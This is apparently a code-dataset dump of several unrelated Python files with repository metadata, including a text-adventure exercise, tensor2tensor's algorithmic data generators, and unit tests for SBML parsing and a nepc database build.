tom.bark(2, pluto)
tom.bark(3, pluto, True)
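The second Animal definition spells out all four ordering methods by hand. The standard-library functools.total_ordering decorator derives the missing comparisons from __eq__ plus one ordering method. A minimal sketch, not part of the book's code:

from functools import total_ordering

@total_ordering
class AgedThing:
    def __init__(self, age):
        self.age = age

    def __eq__(self, other):
        return self.age == other.age

    def __lt__(self, other):
        return self.age < other.age

# total_ordering fills in __le__, __gt__ and __ge__ automatically:
print(AgedThing(5) <= AgedThing(6))  # True
print(AgedThing(8) > AgedThing(5))   # True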
| 23.097297
| 110
| 0.608238
|
| true
| true
|
790dc993af14fbf202955f5e6c992d231e8d2f2f
| 812
|
py
|
Python
|
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | 1
|
2021-01-10T03:39:59.000Z
|
2021-01-10T03:39:59.000Z
|
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | null | null | null |
tests/test_function_definition.py
|
joseph-hellerstein/symSBML-deprecated
|
197f1860bb2e8c5648b3d95d51f8b774fadcaa68
|
[
"MIT"
] | 3
|
2020-08-06T08:02:31.000Z
|
2022-01-16T18:08:35.000Z
|
"""
Tests for Reactions
"""
from src.common import constants as cn
from src.common.simple_sbml import SimpleSBML
from src.common import simple_sbml
from src.common.function_definition import FunctionDefinition
from tests.common import helpers
import copy
import libsbml
import numpy as np
import unittest
IGNORE_TEST = False
IS_PLOT = False
#############################
# Tests
#############################
class TestFunctionDefinition(unittest.TestCase):
def setUp(self):
self.simple = helpers.getSimple_BIOMD56()
self.function_definition = FunctionDefinition(
self.simple.model.getFunctionDefinition(0))
def testConstructor(self):
if IGNORE_TEST:
return
self.assertEqual(len(self.function_definition.argument_names), 4)
if __name__ == '__main__':
unittest.main()
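The IGNORE_TEST flag above disables a test body with an early return, which makes the test count as passed. The standard-library alternative is unittest.skipIf, which reports the test as skipped in the run summary. A minimal sketch:

import unittest

IGNORE_TEST = False  # flip to True to skip instead of silently passing

class TestExample(unittest.TestCase):
    @unittest.skipIf(IGNORE_TEST, "temporarily disabled")
    def test_something(self):
        self.assertEqual(2 + 2, 4)

if __name__ == '__main__':
    unittest.main()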
| 21.368421
| 69
| 0.716749
|
from src.common import constants as cn
from src.common.simple_sbml import SimpleSBML
from src.common import simple_sbml
from src.common.function_definition import FunctionDefinition
from tests.common import helpers
import copy
import libsbml
import numpy as np
import unittest
IGNORE_TEST = False
IS_PLOT = False
| true
| true
|
790dc9cd46fdf4e0494e3bb706af8f1b46702da5
| 2,002
|
py
|
Python
|
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
ex35.py
|
Eithandarphyo51/python-test-exercises
|
85d1cbb82fc878315be46d168e5eb0f949c6ded4
|
[
"MIT"
] | null | null | null |
from sys import exit
def gold_room():
print("This room is full of gold. How much do you t ake?")
choice = input("> ")
if "0" in choice or "1" in choice:
how_much = int(choice)
else:
dead("Man, learn to type a number.")
if how_much < 50:
print("Nice, you're not greedy, you win!")
exit(0)
else:
dead("You greedy bastard!")
def bear_room():
print("There is a bear here.")
print("The bear has a bunch of honey.")
print("The fat bear is in front of another door.")
print("How are you going to move the bear?")
bear_moved = False
while True:
choice = input("> ")
if choice == "take honey":
dead("The bear looks at you then slaps your face off.")
elif choice == "taunt bear" and not bear_moved:
print("The bear has moved from the door.")
print("You can go through it now.")
bear_moved = True
elif choice == "taunt bear" and bear_moved:
dead("The bear gets pissed off and chews your leg off.")
elif choice == "open door" and bear_moved:
gold_room()
else:
print("I got not idea what that means.")
def cthulhu_room():
print("Here you see the great evil Cthulhu.")
print("He, it, whatever stares at you and you go insane.")
print("Do you flee for your life or eat your head?")
choice = input("> ")
if "flee" in choice:
start()
elif "head" in choice:
dead("Well that was tasty!")
else:
cthulhu_room()
def dead(why):
print(why, "Good job!")
exit(0)
def start():
print("You are in a dark room.")
print("There is a door to your right and left.")
print("Which one do you take?")
choice = input("> ")
if choice == "left":
bear_room()
elif choice == "right":
cthulhu_room()
else:
dead("You stumble around the room until you starve.")
start()
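The rooms above transfer control by calling each other directly, so every room change adds a stack frame (start() → cthulhu_room() → start() is mutual recursion). A common refactor is a dispatch loop over a dict of room functions, each returning the key of the next room. A minimal sketch of the idea, with made-up two-room content:

def bear_room():
    # Each room returns the key of the next room instead of calling it.
    return 'gold'

def gold_room():
    return 'exit'

ROOMS = {'bear': bear_room, 'gold': gold_room}

def run(room):
    while room != 'exit':
        room = ROOMS[room]()

run('bear')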
| 25.025
| 83
| 0.564935
|
| true
| true
|
790dcb854858e35c21f05a12f5c5e59fd69b88de
| 17,505
|
py
|
Python
|
tensor2tensor/data_generators/algorithmic.py
|
shankharaj29/tensor2tensor
|
b89ba51a6fa9e0c20009cfb57ee8de04f7138392
|
[
"Apache-2.0"
] | 1
|
2019-02-16T10:39:45.000Z
|
2019-02-16T10:39:45.000Z
|
tensor2tensor/data_generators/algorithmic.py
|
PedroLelis/tensor2tensor
|
5a867d031bd493eeb7d2776e1118d1594ff0a623
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/data_generators/algorithmic.py
|
PedroLelis/tensor2tensor
|
5a867d031bd493eeb7d2776e1118d1594ff0a623
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Algorithmic data generators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import numpy as np
from six.moves import range # pylint: disable=redefined-builtin
from tensor2tensor.data_generators import generator_utils as utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import modalities
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class AlgorithmicProblem(problem.Problem):
"""Base class for algorithmic problems."""
@property
def num_symbols(self):
raise NotImplementedError()
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generates the data."""
raise NotImplementedError()
@property
def train_length(self):
return 40
@property
def dev_length(self):
return 400
@property
def train_size(self):
return 100000
@property
def dev_size(self):
return 10000
@property
def num_shards(self):
return 10
def generate_data(self, data_dir, _, task_id=-1):
def generator_eos(nbr_symbols, max_length, nbr_cases):
"""Shift by NUM_RESERVED_IDS and append EOS token."""
for case in self.generator(nbr_symbols, max_length, nbr_cases):
new_case = {}
for feature in case:
new_case[feature] = [
i + text_encoder.NUM_RESERVED_TOKENS for i in case[feature]
] + [text_encoder.EOS_ID]
yield new_case
utils.generate_dataset_and_shuffle(
generator_eos(self.num_symbols, self.train_length, self.train_size),
self.training_filepaths(data_dir, self.num_shards, shuffled=True),
generator_eos(self.num_symbols, self.dev_length, self.dev_size),
self.dev_filepaths(data_dir, 1, shuffled=True),
shuffle=False)
def hparams(self, defaults, unused_model_hparams):
p = defaults
vocab_size = self.num_symbols + text_encoder.NUM_RESERVED_TOKENS
p.modality = {"inputs": modalities.ModalityType.SYMBOL,
"targets": modalities.ModalityType.SYMBOL}
p.vocab_size = {"inputs": vocab_size,
"targets": vocab_size}
p.input_space_id = problem.SpaceID.DIGIT_0
p.target_space_id = problem.SpaceID.DIGIT_1
@registry.register_problem
class AlgorithmicIdentityBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary identity task."""
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the identity (copy) task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list and target-list are the same.
"""
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": inputs}
@registry.register_problem
class AlgorithmicIdentityDecimal40(AlgorithmicIdentityBinary40):
"""Problem spec for algorithmic decimal identity task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicShiftDecimal40(AlgorithmicProblem):
"""Problem spec for algorithmic decimal shift task."""
@property
def num_symbols(self):
return 20
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the shift task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols - shift]
until nbr_cases sequences have been produced (output[i] = input[i] + shift).
Args:
nbr_symbols: number of symbols to use in each sequence (input + output).
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list[i] = input-list[i] + shift.
"""
shift = 10
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols - shift) for _ in range(l)]
yield {"inputs": inputs, "targets": [i + shift for i in inputs]}
@property
def dev_length(self):
return 80
@registry.register_problem
class AlgorithmicReverseBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary reversing task."""
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generator for the reversing task on sequences of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn uniformly at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list reversed.
"""
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseDecimal40(AlgorithmicReverseBinary40):
"""Problem spec for algorithmic decimal reversing task."""
@property
def num_symbols(self):
return 10
def zipf_distribution(nbr_symbols, alpha):
"""Helper function: Create a Zipf distribution.
Args:
nbr_symbols: number of symbols to use in the distribution.
    alpha: float, Zipf's law distribution parameter. Default = 1.5.
      For modelling natural text, alpha usually lies in the
      range [1.1, 1.6].
Returns:
distr_map: list of float, Zipf's distribution over nbr_symbols.
"""
tmp = np.power(np.arange(1, nbr_symbols + 1), -alpha)
zeta = np.r_[0.0, np.cumsum(tmp)]
return [x / zeta[-1] for x in zeta]
def zipf_random_sample(distr_map, sample_len):
"""Helper function: Generate a random Zipf sample of given length.
Args:
distr_map: list of float, Zipf's distribution over nbr_symbols.
sample_len: integer, length of sequence to generate.
Returns:
sample: list of integer, Zipf's random sample over nbr_symbols.
"""
u = np.random.random(sample_len)
  # np.random.random draws values in [0.0, 1.0); it is extremely
  # unlikely (though possible) for it to return exactly 0.0.
return list(np.searchsorted(distr_map, u))
def reverse_generator_nlplike(nbr_symbols,
max_length,
nbr_cases,
scale_std_dev=100,
alpha=1.5):
"""Generator for the reversing nlp-like task on sequences of symbols.
The length of the sequence is drawn from a Gaussian(Normal) distribution
at random from [1, max_length] and with std deviation of 1%,
then symbols are drawn from Zipf's law at random from [0, nbr_symbols) until
nbr_cases sequences have been produced.
Args:
nbr_symbols: integer, number of symbols.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
scale_std_dev: float, Normal distribution's standard deviation scale factor
used to draw the length of sequence. Default = 1% of the max_length.
    alpha: float, Zipf's law distribution parameter. Default = 1.5.
      For modelling natural text, alpha usually lies in the
      range [1.1, 1.6].
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list reversed.
"""
std_dev = max_length / scale_std_dev
distr_map = zipf_distribution(nbr_symbols, alpha)
for _ in range(nbr_cases):
l = int(abs(np.random.normal(loc=max_length / 2, scale=std_dev)) + 1)
inputs = zipf_random_sample(distr_map, l)
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseNlplike8k(AlgorithmicProblem):
"""Problem spec for algorithmic nlp-like reversing task."""
@property
def num_symbols(self):
return 8000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.300)
@property
def train_length(self):
return 70
@property
def dev_length(self):
return 70
@registry.register_problem
class AlgorithmicReverseNlplike32k(AlgorithmicReverseNlplike8k):
"""Problem spec for algorithmic nlp-like reversing task, 32k vocab."""
@property
def num_symbols(self):
return 32000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.050)
def lower_endian_to_number(l, base):
"""Helper function: convert a list of digits in the given base to a number."""
return sum([d * (base**i) for i, d in enumerate(l)])
def number_to_lower_endian(n, base):
"""Helper function: convert a number to a list of digits in the given base."""
if n < base:
return [n]
return [n % base] + number_to_lower_endian(n // base, base)
def random_number_lower_endian(length, base):
"""Helper function: generate a random number as a lower-endian digits list."""
if length == 1: # Last digit can be 0 only if length is 1.
return [np.random.randint(base)]
prefix = [np.random.randint(base) for _ in range(length - 1)]
return prefix + [np.random.randint(base - 1) + 1] # Last digit is not 0.
@registry.register_problem
class AlgorithmicAdditionBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary addition task."""
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases): # pylint: disable=arguments-differ
"""Generator for the addition task.
The length of each number is drawn uniformly at random in [1, max_length/2]
and then digits are drawn uniformly at random. The numbers are added and
separated by [base] in the input. Stops at nbr_cases.
Args:
base: in which base are the numbers.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list are the 2 numbers and target-list is the result of adding them.
Raises:
ValueError: if max_length is lower than 3.
"""
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) + lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicAdditionDecimal40(AlgorithmicAdditionBinary40):
"""Problem spec for algorithmic decimal addition task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicMultiplicationBinary40(AlgorithmicProblem):
"""Problem spec for algorithmic binary multiplication task."""
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases): # pylint: disable=arguments-differ
"""Generator for the multiplication task.
The length of each number is drawn uniformly at random in [1, max_length/2]
and then digits are drawn uniformly at random. The numbers are multiplied
and separated by [base] in the input. Stops at nbr_cases.
Args:
base: in which base are the numbers.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
input-list are the 2 numbers and target-list is the result of multiplying
them.
Raises:
ValueError: if max_length is lower than 3.
"""
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) * lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicMultiplicationDecimal40(AlgorithmicMultiplicationBinary40):
"""Problem spec for algorithmic decimal multiplication task."""
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicReverseBinary40Test(AlgorithmicReverseBinary40):
"""Test Problem with tiny dataset."""
@property
def train_length(self):
return 10
@property
def dev_length(self):
return 10
@property
def train_size(self):
return 1000
@property
def dev_size(self):
return 100
@property
def num_shards(self):
return 1
@registry.register_problem
class AlgorithmicSortProblem(AlgorithmicProblem):
"""Problem spec for sorting numbers."""
@property
def num_symbols(self):
return max(self.train_length, self.dev_length)
@property
def train_length(self):
return 10
@property
def dev_length(self):
return self.train_length * 2
@property
def unique(self):
"""Unique numbers wo/ replacement or w/ replacement in sorting task."""
return False
def generator(self, nbr_symbols, max_length, nbr_cases):
"""Generating for sorting task on sequence of symbols.
The length of the sequence is drawn uniformly at random from [1, max_length]
and then symbols are drawn (uniquely w/ or w/o replacement) uniformly at
random from [0, nbr_symbols) until nbr_cases sequences have been produced.
Args:
nbr_symbols: number of symbols to use in each sequence.
max_length: integer, maximum length of sequences to generate.
nbr_cases: the number of cases to generate.
Yields:
A dictionary {"inputs": input-list, "targets": target-list} where
target-list is input-list sorted.
"""
for _ in range(nbr_cases):
# Sample the sequence length.
length = np.random.randint(max_length) + 1
if self.unique:
# Sample our inputs w/o replacement.
inputs = np.arange(nbr_symbols)
np.random.shuffle(inputs)
# Truncate to the desired length.
inputs = inputs[:length]
inputs = list(inputs)
else:
inputs = list(np.random.randint(nbr_symbols, size=length))
# Targets are simply the sorted inputs.
targets = list(sorted(inputs))
yield {"inputs": inputs, "targets": targets}
def eval_metrics(self):
defaults = super(AlgorithmicSortProblem, self).eval_metrics()
return defaults + [metrics.Metrics.EDIT_DISTANCE]
@registry.register_problem
class TinyAlgo(AlgorithmicIdentityBinary40):
"""A small algorthmic problem for testing."""
def generate_data(self, data_dir, tmp_dir, task_id=-1):
"""Ganerate data for this problem."""
del tmp_dir, task_id
identity_problem = AlgorithmicIdentityBinary40()
utils.generate_files(
identity_problem.generator(self.num_symbols, 40, 100000),
self.training_filepaths(data_dir, 1, shuffled=True), 100)
utils.generate_files(
identity_problem.generator(self.num_symbols, 400, 10000),
self.dev_filepaths(data_dir, 1, shuffled=True), 100)
@classmethod
def setup_for_test(cls):
"""Setup directories and files required to run the problem."""
tmp_dir = tf.test.get_temp_dir()
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
cls.data_dir = tmp_dir
# Generate a small test dataset
cls().generate_data(TinyAlgo.data_dir, None)
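The addition and multiplication problems above encode numbers as lower-endian digit lists (least significant digit first). The two helpers round-trip cleanly; here is a quick standalone check, with the functions re-stated verbatim so the snippet runs on its own:

def lower_endian_to_number(l, base):
    return sum(d * (base ** i) for i, d in enumerate(l))

def number_to_lower_endian(n, base):
    if n < base:
        return [n]
    return [n % base] + number_to_lower_endian(n // base, base)

assert lower_endian_to_number([3, 2, 1], 10) == 123  # digits are stored reversed
assert number_to_lower_endian(123, 10) == [3, 2, 1]
assert lower_endian_to_number(number_to_lower_endian(45, 2), 2) == 45  # round trip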
| 32.06044
| 87
| 0.70517
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import numpy as np
from six.moves import range
from tensor2tensor.data_generators import generator_utils as utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.layers import modalities
from tensor2tensor.utils import metrics
from tensor2tensor.utils import registry
import tensorflow as tf
class AlgorithmicProblem(problem.Problem):
@property
def num_symbols(self):
raise NotImplementedError()
def generator(self, nbr_symbols, max_length, nbr_cases):
raise NotImplementedError()
@property
def train_length(self):
return 40
@property
def dev_length(self):
return 400
@property
def train_size(self):
return 100000
@property
def dev_size(self):
return 10000
@property
def num_shards(self):
return 10
def generate_data(self, data_dir, _, task_id=-1):
def generator_eos(nbr_symbols, max_length, nbr_cases):
for case in self.generator(nbr_symbols, max_length, nbr_cases):
new_case = {}
for feature in case:
new_case[feature] = [
i + text_encoder.NUM_RESERVED_TOKENS for i in case[feature]
] + [text_encoder.EOS_ID]
yield new_case
utils.generate_dataset_and_shuffle(
generator_eos(self.num_symbols, self.train_length, self.train_size),
self.training_filepaths(data_dir, self.num_shards, shuffled=True),
generator_eos(self.num_symbols, self.dev_length, self.dev_size),
self.dev_filepaths(data_dir, 1, shuffled=True),
shuffle=False)
def hparams(self, defaults, unused_model_hparams):
p = defaults
vocab_size = self.num_symbols + text_encoder.NUM_RESERVED_TOKENS
p.modality = {"inputs": modalities.ModalityType.SYMBOL,
"targets": modalities.ModalityType.SYMBOL}
p.vocab_size = {"inputs": vocab_size,
"targets": vocab_size}
p.input_space_id = problem.SpaceID.DIGIT_0
p.target_space_id = problem.SpaceID.DIGIT_1
@registry.register_problem
class AlgorithmicIdentityBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": inputs}
@registry.register_problem
class AlgorithmicIdentityDecimal40(AlgorithmicIdentityBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicShiftDecimal40(AlgorithmicProblem):
@property
def num_symbols(self):
return 20
def generator(self, nbr_symbols, max_length, nbr_cases):
shift = 10
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols - shift) for _ in range(l)]
yield {"inputs": inputs, "targets": [i + shift for i in inputs]}
@property
def dev_length(self):
return 80
@registry.register_problem
class AlgorithmicReverseBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
l = np.random.randint(max_length) + 1
inputs = [np.random.randint(nbr_symbols) for _ in range(l)]
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseDecimal40(AlgorithmicReverseBinary40):
@property
def num_symbols(self):
return 10
def zipf_distribution(nbr_symbols, alpha):
tmp = np.power(np.arange(1, nbr_symbols + 1), -alpha)
zeta = np.r_[0.0, np.cumsum(tmp)]
return [x / zeta[-1] for x in zeta]
def zipf_random_sample(distr_map, sample_len):
u = np.random.random(sample_len)
return list(np.searchsorted(distr_map, u))
def reverse_generator_nlplike(nbr_symbols,
max_length,
nbr_cases,
scale_std_dev=100,
alpha=1.5):
std_dev = max_length / scale_std_dev
distr_map = zipf_distribution(nbr_symbols, alpha)
for _ in range(nbr_cases):
l = int(abs(np.random.normal(loc=max_length / 2, scale=std_dev)) + 1)
inputs = zipf_random_sample(distr_map, l)
yield {"inputs": inputs, "targets": list(reversed(inputs))}
@registry.register_problem
class AlgorithmicReverseNlplike8k(AlgorithmicProblem):
@property
def num_symbols(self):
return 8000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.300)
@property
def train_length(self):
return 70
@property
def dev_length(self):
return 70
@registry.register_problem
class AlgorithmicReverseNlplike32k(AlgorithmicReverseNlplike8k):
@property
def num_symbols(self):
return 32000
def generator(self, nbr_symbols, max_length, nbr_cases):
return reverse_generator_nlplike(nbr_symbols, max_length, nbr_cases, 10,
1.050)
def lower_endian_to_number(l, base):
return sum([d * (base**i) for i, d in enumerate(l)])
def number_to_lower_endian(n, base):
if n < base:
return [n]
return [n % base] + number_to_lower_endian(n // base, base)
def random_number_lower_endian(length, base):
if length == 1:
return [np.random.randint(base)]
prefix = [np.random.randint(base) for _ in range(length - 1)]
return prefix + [np.random.randint(base - 1) + 1]
@registry.register_problem
class AlgorithmicAdditionBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases):
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) + lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicAdditionDecimal40(AlgorithmicAdditionBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicMultiplicationBinary40(AlgorithmicProblem):
@property
def num_symbols(self):
return 2
def generator(self, base, max_length, nbr_cases):
if max_length < 3:
raise ValueError("Maximum length must be at least 3.")
for _ in range(nbr_cases):
l1 = np.random.randint(max_length // 2) + 1
l2 = np.random.randint(max_length - l1 - 1) + 1
n1 = random_number_lower_endian(l1, base)
n2 = random_number_lower_endian(l2, base)
result = lower_endian_to_number(n1, base) * lower_endian_to_number(
n2, base)
inputs = n1 + [base] + n2
targets = number_to_lower_endian(result, base)
yield {"inputs": inputs, "targets": targets}
@registry.register_problem
class AlgorithmicMultiplicationDecimal40(AlgorithmicMultiplicationBinary40):
@property
def num_symbols(self):
return 10
@registry.register_problem
class AlgorithmicReverseBinary40Test(AlgorithmicReverseBinary40):
@property
def train_length(self):
return 10
@property
def dev_length(self):
return 10
@property
def train_size(self):
return 1000
@property
def dev_size(self):
return 100
@property
def num_shards(self):
return 1
@registry.register_problem
class AlgorithmicSortProblem(AlgorithmicProblem):
@property
def num_symbols(self):
return max(self.train_length, self.dev_length)
@property
def train_length(self):
return 10
@property
def dev_length(self):
return self.train_length * 2
@property
def unique(self):
return False
def generator(self, nbr_symbols, max_length, nbr_cases):
for _ in range(nbr_cases):
length = np.random.randint(max_length) + 1
if self.unique:
inputs = np.arange(nbr_symbols)
np.random.shuffle(inputs)
inputs = inputs[:length]
inputs = list(inputs)
else:
inputs = list(np.random.randint(nbr_symbols, size=length))
targets = list(sorted(inputs))
yield {"inputs": inputs, "targets": targets}
def eval_metrics(self):
defaults = super(AlgorithmicSortProblem, self).eval_metrics()
return defaults + [metrics.Metrics.EDIT_DISTANCE]
@registry.register_problem
class TinyAlgo(AlgorithmicIdentityBinary40):
def generate_data(self, data_dir, tmp_dir, task_id=-1):
del tmp_dir, task_id
identity_problem = AlgorithmicIdentityBinary40()
utils.generate_files(
identity_problem.generator(self.num_symbols, 40, 100000),
self.training_filepaths(data_dir, 1, shuffled=True), 100)
utils.generate_files(
identity_problem.generator(self.num_symbols, 400, 10000),
self.dev_filepaths(data_dir, 1, shuffled=True), 100)
@classmethod
def setup_for_test(cls):
tmp_dir = tf.test.get_temp_dir()
shutil.rmtree(tmp_dir)
os.mkdir(tmp_dir)
cls.data_dir = tmp_dir
cls().generate_data(TinyAlgo.data_dir, None)
| true
| true
|
790dcc8a39bc21aaba4a154ea6758f2c3a81d1da
| 4,509
|
py
|
Python
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 10
|
2020-06-17T14:48:09.000Z
|
2022-01-12T14:15:56.000Z
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 52
|
2020-06-24T20:09:43.000Z
|
2022-01-16T18:24:01.000Z
|
tests/test_mysql_build.py
|
littlewatkins/nepc
|
3e16e3a9622ca0ebb4484c9e4af253046367773a
|
[
"CC0-1.0"
] | 10
|
2020-06-18T14:24:53.000Z
|
2021-10-15T19:39:42.000Z
|
from nepc import nepc
from nepc.util import util
import pandas as pd
import os
import pytest
import platform
# TODO: remove dependence on csv; put function in scraper that uses built-in
# readlines function
import csv
# TODO: test that all values in [nepc]/tests/data are in the nepc database
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_states_table_has_species_metadata(data_config, nepc_connect):
"""
check that the states table has a species_id column
"""
NEPC_DATA = data_config[0]
number_of_states = util.wc_fxn(NEPC_DATA + 'states.tsv') - 1
df_states = nepc.table_as_df(nepc_connect[1], 'states')
assert len(df_states) == number_of_states
assert 'species_id' in list(df_states.columns)
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_csdata_lines(data_config, nepc_connect):
DIR_NAMES = data_config[1]
cs_lines = 0
for directoryname in DIR_NAMES:
directory = os.fsencode(directoryname)
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".met") or filename.endswith(".mod"):
continue
else:
# subtract 1 to account for header
cs_lines += util.wc_fxn(directoryname + filename) - 1
assert cs_lines == nepc.count_table_rows(nepc_connect[1], "csdata")
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_data_entered(data_config, nepc_connect, local):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
delimiter='\t')
else:
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_local.tsv',
delimiter='\t')
for index, row in cs_dat_files.iterrows():
cs_id = row['cs_id']
dat_file = row['filename']
df = pd.read_csv(NEPC_DATA + dat_file + '.dat', delimiter='\t',
usecols=['e_energy', 'sigma'])
e_energy, sigma = nepc.cs_e_sigma(nepc_connect[1], cs_id)
# assert e_energy == pytest.approx(df['e_energy'].tolist())
assert sigma == pytest.approx(df['sigma'].tolist())
@pytest.mark.usefixtures("data_config", "nepc_connect")
def test_meta_entered(data_config, nepc_connect, local, dbug):
NEPC_DATA = data_config[0]
if local is False or platform.node() == 'ppdadamsonlinux':
cs_dat_files = pd.read_csv(NEPC_DATA + 'cs_datfile_prod.tsv',
